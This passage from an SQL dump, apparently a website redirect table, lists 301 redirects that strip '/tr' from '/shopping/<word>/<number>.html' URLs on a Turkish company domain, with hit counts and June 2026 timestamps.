00:00:00',301),(71880,'https://3s-technologies.com.tr/tr/shopping/gerard/2009205890.html',NULL,'https://3s-technologies.com.tr/shopping/gerard/2009205890.html','',1,0,'2026-06-11 04:00:27','0000-00-00 00:00:00',301),(71881,'https://3s-technologies.com.tr/tr/shopping/epipodial/3368397367.html',NULL,'https://3s-technologies.com.tr/shopping/epipodial/3368397367.html','',1,0,'2026-06-11 04:00:30','0000-00-00 00:00:00',301),(71882,'https://3s-technologies.com.tr/tr/shopping/tribromophenol/332631263.html',NULL,'https://3s-technologies.com.tr/shopping/tribromophenol/332631263.html','',1,0,'2026-06-11 04:00:33','0000-00-00 00:00:00',301),(71883,'https://3s-technologies.com.tr/tr/shopping/wishbone/1077160056.html',NULL,'https://3s-technologies.com.tr/shopping/wishbone/1077160056.html','',1,0,'2026-06-11 04:00:36','0000-00-00 00:00:00',301),(71884,'https://3s-technologies.com.tr/tr/shopping/brachycranic/3368319230.html',NULL,'https://3s-technologies.com.tr/shopping/brachycranic/3368319230.html','',1,0,'2026-06-11 04:00:39','0000-00-00 00:00:00',301),(71885,'https://3s-technologies.com.tr/tr/shopping/misimagination/4217375036.html',NULL,'https://3s-technologies.com.tr/shopping/misimagination/4217375036.html','',1,0,'2026-06-11 04:00:42','0000-00-00 00:00:00',301),(71886,'https://3s-technologies.com.tr/tr/shopping/surpassed/3201134662.html',NULL,'https://3s-technologies.com.tr/shopping/surpassed/3201134662.html','',1,0,'2026-06-11 04:00:45','0000-00-00 00:00:00',301),(71887,'https://3s-technologies.com.tr/tr/shopping/kilometer/260555888.html',NULL,'https://3s-technologies.com.tr/shopping/kilometer/260555888.html','',1,0,'2026-06-11 04:00:48','0000-00-00 00:00:00',301),(71888,'https://3s-technologies.com.tr/tr/shopping/hercules/1140728708.html',NULL,'https://3s-technologies.com.tr/shopping/hercules/1140728708.html','',1,0,'2026-06-11 04:00:51','0000-00-00 00:00:00',301),(71889,'https://3s-technologies.com.tr/tr/shopping/anastomotic/367290678.html',NULL,'https://3s-technologies.com.tr/shopping/anastomotic/367290678.html','',1,0,'2026-06-11 04:00:54','0000-00-00 00:00:00',301),(71890,'https://3s-technologies.com.tr/tr/shopping/lucernal/1711531968.html',NULL,'https://3s-technologies.com.tr/shopping/lucernal/1711531968.html','',1,0,'2026-06-11 04:00:57','0000-00-00 00:00:00',301),(71891,'https://3s-technologies.com.tr/tr/shopping/infant/3217960736.html',NULL,'https://3s-technologies.com.tr/shopping/infant/3217960736.html','',1,0,'2026-06-11 04:01:00','0000-00-00 00:00:00',301),(71892,'https://3s-technologies.com.tr/tr/shopping/waver/1546658001.html',NULL,'https://3s-technologies.com.tr/shopping/waver/1546658001.html','',1,0,'2026-06-11 04:01:03','0000-00-00 00:00:00',301),(71893,'https://3s-technologies.com.tr/tr/shopping/veritas/4140874396.html',NULL,'https://3s-technologies.com.tr/shopping/veritas/4140874396.html','',1,0,'2026-06-11 04:01:06','0000-00-00 00:00:00',301),(71894,'https://3s-technologies.com.tr/tr/shopping/moneta/723655722.html',NULL,'https://3s-technologies.com.tr/shopping/moneta/723655722.html','',1,0,'2026-06-11 04:01:09','0000-00-00 00:00:00',301),(71895,'https://3s-technologies.com.tr/tr/shopping/crippled/1740997661.html',NULL,'https://3s-technologies.com.tr/shopping/crippled/1740997661.html','',1,0,'2026-06-11 04:01:12','0000-00-00 00:00:00',301),(71896,'https://3s-technologies.com.tr/tr/shopping/tosspot/2681847469.html',NULL,'https://3s-technologies.com.tr/shopping/tosspot/2681847469.html','',1,0,'2026-06-11 04:01:15','0000-00-00 00:00:00',301),(71897,'https://3s-technologies.com.tr/tr/shopping/majestical/85230731.html',NULL,'https://3s-technologies.com.tr/shopping/majestical/85230731.html','',1,0,'2026-06-11 04:01:18','0000-00-00 00:00:00',301),(71898,'https://3s-technologies.com.tr/tr/shopping/allfours/2157314407.html',NULL,'https://3s-technologies.com.tr/shopping/allfours/2157314407.html','',1,0,'2026-06-11 04:01:21','0000-00-00 00:00:00',301),(71899,'https://3s-technologies.com.tr/tr/shopping/disproving/2054239754.html',NULL,'https://3s-technologies.com.tr/shopping/disproving/2054239754.html','',1,0,'2026-06-11 04:01:24','0000-00-00 00:00:00',301),(71900,'https://3s-technologies.com.tr/tr/shopping/phocodont/2092275890.html',NULL,'https://3s-technologies.com.tr/shopping/phocodont/2092275890.html','',1,0,'2026-06-11 04:01:31','0000-00-00 00:00:00',301),(71901,'https://3s-technologies.com.tr/tr/shopping/marbling/865445978.html',NULL,'https://3s-technologies.com.tr/shopping/marbling/865445978.html','',1,0,'2026-06-11 04:01:33','0000-00-00 00:00:00',301),(71902,'https://3s-technologies.com.tr/tr/shopping/epitomes/2985560333.html',NULL,'https://3s-technologies.com.tr/shopping/epitomes/2985560333.html','',1,0,'2026-06-11 04:01:36','0000-00-00 00:00:00',301),(71903,'https://3s-technologies.com.tr/tr/shopping/spoken/3260710070.html',NULL,'https://3s-technologies.com.tr/shopping/spoken/3260710070.html','',1,0,'2026-06-11 04:01:39','0000-00-00 00:00:00',301),(71904,'https://3s-technologies.com.tr/tr/shopping/monist/4023797522.html',NULL,'https://3s-technologies.com.tr/shopping/monist/4023797522.html','',1,0,'2026-06-11 04:01:42','0000-00-00 00:00:00',301),(71905,'https://3s-technologies.com.tr/tr/shopping/godward/1809532808.html',NULL,'https://3s-technologies.com.tr/shopping/godward/1809532808.html','',1,0,'2026-06-11 04:01:46','0000-00-00 00:00:00',301),(71906,'https://3s-technologies.com.tr/tr/shopping/sypheotides/3979237434.html',NULL,'https://3s-technologies.com.tr/shopping/sypheotides/3979237434.html','',1,0,'2026-06-11 04:01:48','0000-00-00 00:00:00',301),(71907,'https://3s-technologies.com.tr/tr/shopping/sarda/3572206022.html',NULL,'https://3s-technologies.com.tr/shopping/sarda/3572206022.html','',1,0,'2026-06-11 04:01:53','0000-00-00 00:00:00',301),(71908,'https://3s-technologies.com.tr/tr/shopping/idism/2941796417.html',NULL,'https://3s-technologies.com.tr/shopping/idism/2941796417.html','',1,0,'2026-06-11 04:01:55','0000-00-00 00:00:00',301),(71909,'https://3s-technologies.com.tr/tr/shopping/preparation/3141338325.html',NULL,'https://3s-technologies.com.tr/shopping/preparation/3141338325.html','',1,0,'2026-06-11 04:01:58','0000-00-00 00:00:00',301),(71910,'https://3s-technologies.com.tr/tr/shopping/disglory/2092662013.html',NULL,'https://3s-technologies.com.tr/shopping/disglory/2092662013.html','',1,0,'2026-06-11 04:02:01','0000-00-00 00:00:00',301),(71911,'https://3s-technologies.com.tr/tr/shopping/marge/1137833379.html',NULL,'https://3s-technologies.com.tr/shopping/marge/1137833379.html','',1,0,'2026-06-11 04:02:04','0000-00-00 00:00:00',301),(71912,'https://3s-technologies.com.tr/tr/shopping/assamar/4225425883.html',NULL,'https://3s-technologies.com.tr/shopping/assamar/4225425883.html','',1,0,'2026-06-11 04:02:07','0000-00-00 00:00:00',301),(71913,'https://3s-technologies.com.tr/tr/shopping/godling/4237536506.html',NULL,'https://3s-technologies.com.tr/shopping/godling/4237536506.html','',1,0,'2026-06-11 04:02:10','0000-00-00 00:00:00',301),(71914,'https://3s-technologies.com.tr/tr/shopping/individuality/127848813.html',NULL,'https://3s-technologies.com.tr/shopping/individuality/127848813.html','',1,0,'2026-06-11 04:02:13','0000-00-00 00:00:00',301),(71915,'https://3s-technologies.com.tr/tr/shopping/clinographic/3448587309.html',NULL,'https://3s-technologies.com.tr/shopping/clinographic/3448587309.html','',1,0,'2026-06-11 04:02:16','0000-00-00 00:00:00',301),(71916,'https://3s-technologies.com.tr/tr/shopping/anchor/4044685946.html',NULL,'https://3s-technologies.com.tr/shopping/anchor/4044685946.html','',1,0,'2026-06-11 04:02:19','0000-00-00 00:00:00',301),(71917,'https://3s-technologies.com.tr/tr/shopping/gynodioecious/678269674.html',NULL,'https://3s-technologies.com.tr/shopping/gynodioecious/678269674.html','',1,0,'2026-06-11 04:02:22','0000-00-00 00:00:00',301),(71918,'https://3s-technologies.com.tr/tr/shopping/aerodonetics/1472850931.html',NULL,'https://3s-technologies.com.tr/shopping/aerodonetics/1472850931.html','',1,0,'2026-06-11 04:02:25','0000-00-00 00:00:00',301),(71919,'https://3s-technologies.com.tr/tr/shopping/endictment/1709240747.html',NULL,'https://3s-technologies.com.tr/shopping/endictment/1709240747.html','',1,0,'2026-06-11 04:02:28','0000-00-00 00:00:00',301),(71920,'https://3s-technologies.com.tr/tr/shopping/admirably/2156601616.html',NULL,'https://3s-technologies.com.tr/shopping/admirably/2156601616.html','',1,0,'2026-06-11 04:02:31','0000-00-00 00:00:00',301),(71921,'https://3s-technologies.com.tr/tr/shopping/duomo/509851606.html',NULL,'https://3s-technologies.com.tr/shopping/duomo/509851606.html','',1,0,'2026-06-11 04:02:41','0000-00-00 00:00:00',301),(71922,'https://3s-technologies.com.tr/tr/shopping/perilled/1438747972.html',NULL,'https://3s-technologies.com.tr/shopping/perilled/1438747972.html','',1,0,'2026-06-11 04:02:43','0000-00-00 00:00:00',301),(71923,'https://3s-technologies.com.tr/tr/shopping/rectirostral/2096315394.html',NULL,'https://3s-technologies.com.tr/shopping/rectirostral/2096315394.html','',1,0,'2026-06-11 04:02:46','0000-00-00 00:00:00',301),(71924,'https://3s-technologies.com.tr/tr/shopping/superalimentation/128012336.html',NULL,'https://3s-technologies.com.tr/shopping/superalimentation/128012336.html','',1,0,'2026-06-11 04:02:49','0000-00-00 00:00:00',301),(71925,'https://3s-technologies.com.tr/tr/shopping/outway/491698375.html',NULL,'https://3s-technologies.com.tr/shopping/outway/491698375.html','',1,0,'2026-06-11 04:02:52','0000-00-00 00:00:00',301),(71926,'https://3s-technologies.com.tr/tr/shopping/product/2155535940.html',NULL,'https://3s-technologies.com.tr/shopping/product/2155535940.html','',1,0,'2026-06-11 04:02:55','0000-00-00 00:00:00',301),(71927,'https://3s-technologies.com.tr/tr/shopping/diversified/311131031.html',NULL,'https://3s-technologies.com.tr/shopping/diversified/311131031.html','',1,0,'2026-06-11 04:02:58','0000-00-00 00:00:00',301),(71928,'https://3s-technologies.com.tr/tr/shopping/defying/1323009828.html',NULL,'https://3s-technologies.com.tr/shopping/defying/1323009828.html','',1,0,'2026-06-11 04:03:01','0000-00-00 00:00:00',301),(71929,'https://3s-technologies.com.tr/tr/shopping/estimated/3613860536.html',NULL,'https://3s-technologies.com.tr/shopping/estimated/3613860536.html','',1,0,'2026-06-11 04:03:04','0000-00-00 00:00:00',301),(71930,'https://3s-technologies.com.tr/tr/shopping/astrocyte/580411707.html',NULL,'https://3s-technologies.com.tr/shopping/astrocyte/580411707.html','',1,0,'2026-06-11 04:03:07','0000-00-00 00:00:00',301),(71931,'https://3s-technologies.com.tr/tr/shopping/budorcas/901317508.html',NULL,'https://3s-technologies.com.tr/shopping/budorcas/901317508.html','',1,0,'2026-06-11 04:03:10','0000-00-00 00:00:00',301),(71932,'https://3s-technologies.com.tr/tr/shopping/warehousemen/478481311.html',NULL,'https://3s-technologies.com.tr/shopping/warehousemen/478481311.html','',1,0,'2026-06-11 04:03:13','0000-00-00 00:00:00',301),(71933,'https://3s-technologies.com.tr/tr/shopping/cyclopic/1145662838.html',NULL,'https://3s-technologies.com.tr/shopping/cyclopic/1145662838.html','',1,0,'2026-06-11 04:03:16','0000-00-00 00:00:00',301),(71934,'https://3s-technologies.com.tr/tr/shopping/cetologist/257643459.html',NULL,'https://3s-technologies.com.tr/shopping/cetologist/257643459.html','',1,0,'2026-06-11 04:03:19','0000-00-00 00:00:00',301),(71935,'https://3s-technologies.com.tr/tr/shopping/flanellette/1281163992.html',NULL,'https://3s-technologies.com.tr/shopping/flanellette/1281163992.html','',1,0,'2026-06-11 04:03:22','0000-00-00 00:00:00',301),(71936,'https://3s-technologies.com.tr/tr/shopping/gustatory/1755804547.html',NULL,'https://3s-technologies.com.tr/shopping/gustatory/1755804547.html','',1,0,'2026-06-11 04:03:25','0000-00-00 00:00:00',301),(71937,'https://3s-technologies.com.tr/tr/shopping/bumpkinly/719453073.html',NULL,'https://3s-technologies.com.tr/shopping/bumpkinly/719453073.html','',1,0,'2026-06-11 04:03:28','0000-00-00 00:00:00',301),(71938,'https://3s-technologies.com.tr/tr/shopping/megalith/4077671217.html',NULL,'https://3s-technologies.com.tr/shopping/megalith/4077671217.html','',1,0,'2026-06-11 04:03:33','0000-00-00 00:00:00',301),(71939,'https://3s-technologies.com.tr/tr/shopping/pickpurse/4002960105.html',NULL,'https://3s-technologies.com.tr/shopping/pickpurse/4002960105.html','',1,0,'2026-06-11 04:03:37','0000-00-00 00:00:00',301),(71940,'https://3s-technologies.com.tr/tr/shopping/kousso/1651657462.html',NULL,'https://3s-technologies.com.tr/shopping/kousso/1651657462.html','',1,0,'2026-06-11 04:03:40','0000-00-00 00:00:00',301),(71941,'https://3s-technologies.com.tr/tr/shopping/scarus/484204045.html',NULL,'https://3s-technologies.com.tr/shopping/scarus/484204045.html','',1,0,'2026-06-11 04:03:47','0000-00-00 00:00:00',301),(71942,'https://3s-technologies.com.tr/tr/shopping/pettifogging/2552911032.html',NULL,'https://3s-technologies.com.tr/shopping/pettifogging/2552911032.html','',1,0,'2026-06-11 04:03:49','0000-00-00 00:00:00',301),(71943,'https://3s-technologies.com.tr/tr/shopping/gerris/3441086108.html',NULL,'https://3s-technologies.com.tr/shopping/gerris/3441086108.html','',1,0,'2026-06-11 04:03:52','0000-00-00 00:00:00',301),(71944,'https://3s-technologies.com.tr/tr/shopping/chepster/63210919.html',NULL,'https://3s-technologies.com.tr/shopping/chepster/63210919.html','',1,0,'2026-06-11 04:03:55','0000-00-00 00:00:00',301),(71945,'https://3s-technologies.com.tr/tr/shopping/spitfuls/1423780240.html',NULL,'https://3s-technologies.com.tr/shopping/spitfuls/1423780240.html','',1,0,'2026-06-11 04:03:58','0000-00-00 00:00:00',301),(71946,'https://3s-technologies.com.tr/tr/shopping/fingerpost/2096786525.html',NULL,'https://3s-technologies.com.tr/shopping/fingerpost/2096786525.html','',1,0,'2026-06-11 04:04:01','0000-00-00 00:00:00',301),(71947,'https://3s-technologies.com.tr/tr/shopping/counterdrawn/3380084527.html',NULL,'https://3s-technologies.com.tr/shopping/counterdrawn/3380084527.html','',1,0,'2026-06-11 04:04:04','0000-00-00 00:00:00',301),(71948,'https://3s-technologies.com.tr/tr/shopping/macropodidae/1729972474.html',NULL,'https://3s-technologies.com.tr/shopping/macropodidae/1729972474.html','',1,0,'2026-06-11 04:04:07','0000-00-00 00:00:00',301),(71949,'https://3s-technologies.com.tr/tr/shopping/lientery/3475446969.html',NULL,'https://3s-technologies.com.tr/shopping/lientery/3475446969.html','',1,0,'2026-06-11 04:04:10','0000-00-00 00:00:00',301),(71950,'https://3s-technologies.com.tr/tr/shopping/parure/2407838353.html',NULL,'https://3s-technologies.com.tr/shopping/parure/2407838353.html','',1,0,'2026-06-11 04:04:13','0000-00-00 00:00:00',301),(71951,'https://3s-technologies.com.tr/tr/shopping/linum/3784057087.html',NULL,'https://3s-technologies.com.tr/shopping/linum/3784057087.html','',1,0,'2026-06-11 04:04:16','0000-00-00 00:00:00',301),(71952,'https://3s-technologies.com.tr/tr/shopping/osphromenus/18729000.html',NULL,'https://3s-technologies.com.tr/shopping/osphromenus/18729000.html','',1,0,'2026-06-11 04:04:19','0000-00-00 00:00:00',301),(71953,'https://3s-technologies.com.tr/tr/shopping/plucker/1861710832.html',NULL,'https://3s-technologies.com.tr/shopping/plucker/1861710832.html','',1,0,'2026-06-11 04:04:22','0000-00-00 00:00:00',301),(71954,'https://3s-technologies.com.tr/tr/shopping/lithophotography/154409935.html',NULL,'https://3s-technologies.com.tr/shopping/lithophotography/154409935.html','',1,0,'2026-06-11 04:04:25','0000-00-00 00:00:00',301),(71955,'https://3s-technologies.com.tr/tr/shopping/rhynchota/124566503.html',NULL,'https://3s-technologies.com.tr/shopping/rhynchota/124566503.html','',1,0,'2026-06-11 04:04:29','0000-00-00 00:00:00',301),(71956,'https://3s-technologies.com.tr/tr/shopping/elvishly/2970898865.html',NULL,'https://3s-technologies.com.tr/shopping/elvishly/2970898865.html','',1,0,'2026-06-11 04:04:32','0000-00-00 00:00:00',301),(71957,'https://3s-technologies.com.tr/tr/shopping/prezygapophyses/4224213768.html',NULL,'https://3s-technologies.com.tr/shopping/prezygapophyses/4224213768.html','',1,0,'2026-06-11 04:04:35','0000-00-00 00:00:00',301),(71958,'https://3s-technologies.com.tr/tr/shopping/opertaneous/2031306429.html',NULL,'https://3s-technologies.com.tr/shopping/opertaneous/2031306429.html','',1,0,'2026-06-11 04:04:38','0000-00-00 00:00:00',301),(71959,'https://3s-technologies.com.tr/tr/shopping/caboched/3938305143.html',NULL,'https://3s-technologies.com.tr/shopping/caboched/3938305143.html','',1,0,'2026-06-11 04:04:41','0000-00-00 00:00:00',301),(71960,'https://3s-technologies.com.tr/tr/shopping/uralaltaic/1453938436.html',NULL,'https://3s-technologies.com.tr/shopping/uralaltaic/1453938436.html','',1,0,'2026-06-11 04:04:44','0000-00-00 00:00:00',301),(71961,'https://3s-technologies.com.tr/tr/shopping/griseous/274863482.html',NULL,'https://3s-technologies.com.tr/shopping/griseous/274863482.html','',1,0,'2026-06-11 04:04:47','0000-00-00 00:00:00',301),(71962,'https://3s-technologies.com.tr/tr/shopping/resupinate/2967358653.html',NULL,'https://3s-technologies.com.tr/shopping/resupinate/2967358653.html','',1,0,'2026-06-11 04:04:50','0000-00-00 00:00:00',301),(71963,'https://3s-technologies.com.tr/tr/shopping/metalloidal/1852850251.html',NULL,'https://3s-technologies.com.tr/shopping/metalloidal/1852850251.html','',1,0,'2026-06-11 04:04:53','0000-00-00 00:00:00',301),(71964,'https://3s-technologies.com.tr/tr/shopping/increaseful/3619661439.html',NULL,'https://3s-technologies.com.tr/shopping/increaseful/3619661439.html','',1,0,'2026-06-11 04:04:56','0000-00-00 00:00:00',301),(71965,'https://3s-technologies.com.tr/tr/shopping/communist/1830742870.html',NULL,'https://3s-technologies.com.tr/shopping/communist/1830742870.html','',1,0,'2026-06-11 04:04:59','0000-00-00 00:00:00',301),(71966,'https://3s-technologies.com.tr/tr/shopping/swirling/1063340593.html',NULL,'https://3s-technologies.com.tr/shopping/swirling/1063340593.html','',1,0,'2026-06-11 04:05:02','0000-00-00 00:00:00',301),(71967,'https://3s-technologies.com.tr/tr/shopping/dismount/1665704493.html',NULL,'https://3s-technologies.com.tr/shopping/dismount/1665704493.html','',1,0,'2026-06-11 04:05:05','0000-00-00 00:00:00',301),(71968,'https://3s-technologies.com.tr/tr/shopping/uncanniness/1163622842.html',NULL,'https://3s-technologies.com.tr/shopping/uncanniness/1163622842.html','',1,0,'2026-06-11 04:05:08','0000-00-00 00:00:00',301),(71969,'https://3s-technologies.com.tr/tr/shopping/kinic/1279951893.html',NULL,'https://3s-technologies.com.tr/shopping/kinic/1279951893.html','',1,0,'2026-06-11 04:05:11','0000-00-00 00:00:00',301),(71970,'https://3s-technologies.com.tr/tr/shopping/buntings/494757243.html',NULL,'https://3s-technologies.com.tr/shopping/buntings/494757243.html','',1,0,'2026-06-11 04:05:14','0000-00-00 00:00:00',301),(71971,'https://3s-technologies.com.tr/tr/shopping/shiny/1947185106.html',NULL,'https://3s-technologies.com.tr/shopping/shiny/1947185106.html','',1,0,'2026-06-11 04:05:17','0000-00-00 00:00:00',301),(71972,'https://3s-technologies.com.tr/tr/shopping/prosternum/2648714917.html',NULL,'https://3s-technologies.com.tr/shopping/prosternum/2648714917.html','',1,0,'2026-06-11 04:05:20','0000-00-00 00:00:00',301),(71973,'https://3s-technologies.com.tr/tr/shopping/wonted/901703647.html',NULL,'https://3s-technologies.com.tr/shopping/wonted/901703647.html','',1,0,'2026-06-11 04:05:23','0000-00-00 00:00:00',301),(71974,'https://3s-technologies.com.tr/tr/shopping/garnished/4220837079.html',NULL,'https://3s-technologies.com.tr/shopping/garnished/4220837079.html','',1,0,'2026-06-11 04:05:26','0000-00-00 00:00:00',301),(71975,'https://3s-technologies.com.tr/tr/shopping/encope/3723972047.html',NULL,'https://3s-technologies.com.tr/shopping/encope/3723972047.html','',1,0,'2026-06-11 04:05:29','0000-00-00 00:00:00',301),(71976,'https://3s-technologies.com.tr/tr/shopping/sundew/1917912640.html',NULL,'https://3s-technologies.com.tr/shopping/sundew/1917912640.html','',1,0,'2026-06-11 04:05:32','0000-00-00 00:00:00',301),(71977,'https://3s-technologies.com.tr/tr/shopping/fragilely/3588840758.html',NULL,'https://3s-technologies.com.tr/shopping/fragilely/3588840758.html','',1,0,'2026-06-11 04:05:35','0000-00-00 00:00:00',301),(71978,'https://3s-technologies.com.tr/tr/shopping/effusum/1217738213.html',NULL,'https://3s-technologies.com.tr/shopping/effusum/1217738213.html','',1,0,'2026-06-11 04:05:38','0000-00-00 00:00:00',301),(71979,'https://3s-technologies.com.tr/tr/shopping/enameler/22269228.html',NULL,'https://3s-technologies.com.tr/shopping/enameler/22269228.html','',1,0,'2026-06-11 04:05:41','0000-00-00 00:00:00',301),(71980,'https://3s-technologies.com.tr/tr/shopping/ariose/1367282423.html',NULL,'https://3s-technologies.com.tr/shopping/ariose/1367282423.html','',1,0,'2026-06-11 04:05:44','0000-00-00 00:00:00',301),(71981,'https://3s-technologies.com.tr/tr/shopping/presbyteress/1033198623.html',NULL,'https://3s-technologies.com.tr/shopping/presbyteress/1033198623.html','',1,0,'2026-06-11 04:05:47','0000-00-00 00:00:00',301),(71982,'https://3s-technologies.com.tr/tr/shopping/deracinated/2740333807.html',NULL,'https://3s-technologies.com.tr/shopping/deracinated/2740333807.html','',1,0,'2026-06-11 04:05:50','0000-00-00 00:00:00',301),(71983,'https://3s-technologies.com.tr/tr/shopping/cephalotribe/3597018252.html',NULL,'https://3s-technologies.com.tr/shopping/cephalotribe/3597018252.html','',1,0,'2026-06-11 04:05:53','0000-00-00 00:00:00',301),(71984,'https://3s-technologies.com.tr/tr/shopping/peise/2748299268.html',NULL,'https://3s-technologies.com.tr/shopping/peise/2748299268.html','',1,0,'2026-06-11 04:05:56','0000-00-00 00:00:00',301),(71985,'https://3s-technologies.com.tr/tr/shopping/eminency/1550584336.html',NULL,'https://3s-technologies.com.tr/shopping/eminency/1550584336.html','',1,0,'2026-06-11 04:05:59','0000-00-00 00:00:00',301),(71986,'https://3s-technologies.com.tr/tr/shopping/ensilage/2529032026.html',NULL,'https://3s-technologies.com.tr/shopping/ensilage/2529032026.html','',1,0,'2026-06-11 04:06:02','0000-00-00 00:00:00',301),(71987,'https://3s-technologies.com.tr/tr/shopping/members/2258399615.html',NULL,'https://3s-technologies.com.tr/shopping/members/2258399615.html','',1,0,'2026-06-11 04:06:05','0000-00-00 00:00:00',301),(71988,'https://3s-technologies.com.tr/tr/shopping/septomaxillary/750572276.html',NULL,'https://3s-technologies.com.tr/shopping/septomaxillary/750572276.html','',1,0,'2026-06-11 04:06:08','0000-00-00 00:00:00',301),(71989,'https://3s-technologies.com.tr/tr/shopping/strepitores/904144929.html',NULL,'https://3s-technologies.com.tr/shopping/strepitores/904144929.html','',1,0,'2026-06-11 04:06:11','0000-00-00 00:00:00',301),(71990,'https://3s-technologies.com.tr/tr/shopping/gynandromorph/1489228752.html',NULL,'https://3s-technologies.com.tr/shopping/gynandromorph/1489228752.html','',1,0,'2026-06-11 04:06:17','0000-00-00 00:00:00',301),(71991,'https://3s-technologies.com.tr/tr/shopping/horologe/4041403652.html',NULL,'https://3s-technologies.com.tr/shopping/horologe/4041403652.html','',1,0,'2026-06-11 04:06:20','0000-00-00 00:00:00',301),(71992,'https://3s-technologies.com.tr/tr/shopping/inned/1212985918.html',NULL,'https://3s-technologies.com.tr/shopping/inned/1212985918.html','',1,0,'2026-06-11 04:06:24','0000-00-00 00:00:00',301),(71993,'https://3s-technologies.com.tr/tr/shopping/residency/1264558976.html',NULL,'https://3s-technologies.com.tr/shopping/residency/1264558976.html','',1,0,'2026-06-11 04:06:26','0000-00-00 00:00:00',301),(71994,'https://3s-technologies.com.tr/tr/shopping/torturous/2737421394.html',NULL,'https://3s-technologies.com.tr/shopping/torturous/2737421394.html','',1,0,'2026-06-11 04:06:29','0000-00-00 00:00:00',301),(71995,'https://3s-technologies.com.tr/tr/shopping/manhattan/2680068986.html',NULL,'https://3s-technologies.com.tr/shopping/manhattan/2680068986.html','',1,0,'2026-06-11 04:06:33','0000-00-00 00:00:00',301),(71996,'https://3s-technologies.com.tr/tr/shopping/prehensible/115467080.html',NULL,'https://3s-technologies.com.tr/shopping/prehensible/115467080.html','',1,0,'2026-06-11 04:06:38','0000-00-00 00:00:00',301),(71997,'https://3s-technologies.com.tr/tr/shopping/lackadaisy/2478229640.html',NULL,'https://3s-technologies.com.tr/shopping/lackadaisy/2478229640.html','',1,0,'2026-06-11 04:06:42','0000-00-00 00:00:00',301),(71998,'https://3s-technologies.com.tr/tr/shopping/nasomaculatus/1664752002.html',NULL,'https://3s-technologies.com.tr/shopping/nasomaculatus/1664752002.html','',1,0,'2026-06-11 04:06:44','0000-00-00 00:00:00',301),(71999,'https://3s-technologies.com.tr/tr/shopping/keckle/1051294629.html',NULL,'https://3s-technologies.com.tr/shopping/keckle/1051294629.html','',1,0,'2026-06-11 04:06:48','0000-00-00 00:00:00',301),(72000,'https://3s-technologies.com.tr/tr/shopping/vowel/182790160.html',NULL,'https://3s-technologies.com.tr/shopping/vowel/182790160.html','',1,0,'2026-06-11 04:06:51','0000-00-00 00:00:00',301),(72001,'https://3s-technologies.com.tr/tr/shopping/flambeaus/33321702.html',NULL,'https://3s-technologies.com.tr/shopping/flambeaus/33321702.html','',1,0,'2026-06-11 04:06:54','0000-00-00 00:00:00',301),(72002,'https://3s-technologies.com.tr/tr/shopping/lionly/1063177070.html',NULL,'https://3s-technologies.com.tr/shopping/lionly/1063177070.html','',1,0,'2026-06-11 04:06:56','0000-00-00 00:00:00',301),(72003,'https://3s-technologies.com.tr/tr/shopping/rutted/801998911.html',NULL,'https://3s-technologies.com.tr/shopping/rutted/801998911.html','',1,0,'2026-06-11 04:07:00','0000-00-00 00:00:00',301),(72004,'https://3s-technologies.com.tr/tr/shopping/publican/4172978471.html',NULL,'https://3s-technologies.com.tr/shopping/publican/4172978471.html','',1,0,'2026-06-11 04:07:02','0000-00-00 00:00:00',301),(72005,'https://3s-technologies.com.tr/tr/shopping/erinys/2854498268.html',NULL,'https://3s-technologies.com.tr/shopping/erinys/2854498268.html','',1,0,'2026-06-11 04:07:05','0000-00-00 00:00:00',301),(72006,'https://3s-technologies.com.tr/tr/shopping/becomingness/880366938.html',NULL,'https://3s-technologies.com.tr/shopping/becomingness/880366938.html','',1,0,'2026-06-11 04:07:09','0000-00-00 00:00:00',301),(72007,'https://3s-technologies.com.tr/tr/shopping/sodio/3459816784.html',NULL,'https://3s-technologies.com.tr/shopping/sodio/3459816784.html','',1,0,'2026-06-11 04:07:11','0000-00-00 00:00:00',301),(72008,'https://3s-technologies.com.tr/tr/shopping/hosiery/119977715.html',NULL,'https://3s-technologies.com.tr/shopping/hosiery/119977715.html','',1,0,'2026-06-11 04:07:18','0000-00-00 00:00:00',301),(72009,'https://3s-technologies.com.tr/tr/shopping/chloric/4216712567.html',NULL,'https://3s-technologies.com.tr/shopping/chloric/4216712567.html','',1,0,'2026-06-11 04:07:22','0000-00-00 00:00:00',301),(72010,'https://3s-technologies.com.tr/tr/shopping/lobster/1034410722.html',NULL,'https://3s-technologies.com.tr/shopping/lobster/1034410722.html','',1,0,'2026-06-11 04:07:25','0000-00-00 00:00:00',301),(72011,'https://3s-technologies.com.tr/tr/shopping/celastraceae/1994804030.html',NULL,'https://3s-technologies.com.tr/shopping/celastraceae/1994804030.html','',1,0,'2026-06-11 04:07:28','0000-00-00 00:00:00',301),(72012,'https://3s-technologies.com.tr/tr/shopping/petrescence/3056045886.html',NULL,'https://3s-technologies.com.tr/shopping/petrescence/3056045886.html','',1,0,'2026-06-11 04:07:31','0000-00-00 00:00:00',301),(72013,'https://3s-technologies.com.tr/tr/shopping/consistory/3411178988.html',NULL,'https://3s-technologies.com.tr/shopping/consistory/3411178988.html','',1,0,'2026-06-11 04:07:34','0000-00-00 00:00:00',301),(72014,'https://3s-technologies.com.tr/tr/shopping/marantaceae/133427100.html',NULL,'https://3s-technologies.com.tr/shopping/marantaceae/133427100.html','',1,0,'2026-06-11 04:07:37','0000-00-00 00:00:00',301),(72015,'https://3s-technologies.com.tr/tr/shopping/sapotaceae/363828635.html',NULL,'https://3s-technologies.com.tr/shopping/sapotaceae/363828635.html','',1,0,'2026-06-11 04:07:40','0000-00-00 00:00:00',301),(72016,'https://3s-technologies.com.tr/tr/shopping/galvanotonus/2251724374.html',NULL,'https://3s-technologies.com.tr/shopping/galvanotonus/2251724374.html','',1,0,'2026-06-11 04:07:43','0000-00-00 00:00:00',301),(72017,'https://3s-technologies.com.tr/tr/shopping/serein/2370195182.html',NULL,'https://3s-technologies.com.tr/shopping/serein/2370195182.html','',1,0,'2026-06-11 04:07:46','0000-00-00 00:00:00',301),(72018,'https://3s-technologies.com.tr/tr/shopping/protovertebrae/1571534890.html',NULL,'https://3s-technologies.com.tr/shopping/protovertebrae/1571534890.html','',1,0,'2026-06-11 04:07:49','0000-00-00 00:00:00',301),(72019,'https://3s-technologies.com.tr/tr/shopping/dyspepsia/3337764983.html',NULL,'https://3s-technologies.com.tr/shopping/dyspepsia/3337764983.html','',1,0,'2026-06-11 04:07:52','0000-00-00 00:00:00',301),(72020,'https://3s-technologies.com.tr/tr/shopping/wilderment/3229031325.html',NULL,'https://3s-technologies.com.tr/shopping/wilderment/3229031325.html','',1,0,'2026-06-11 04:07:55','0000-00-00 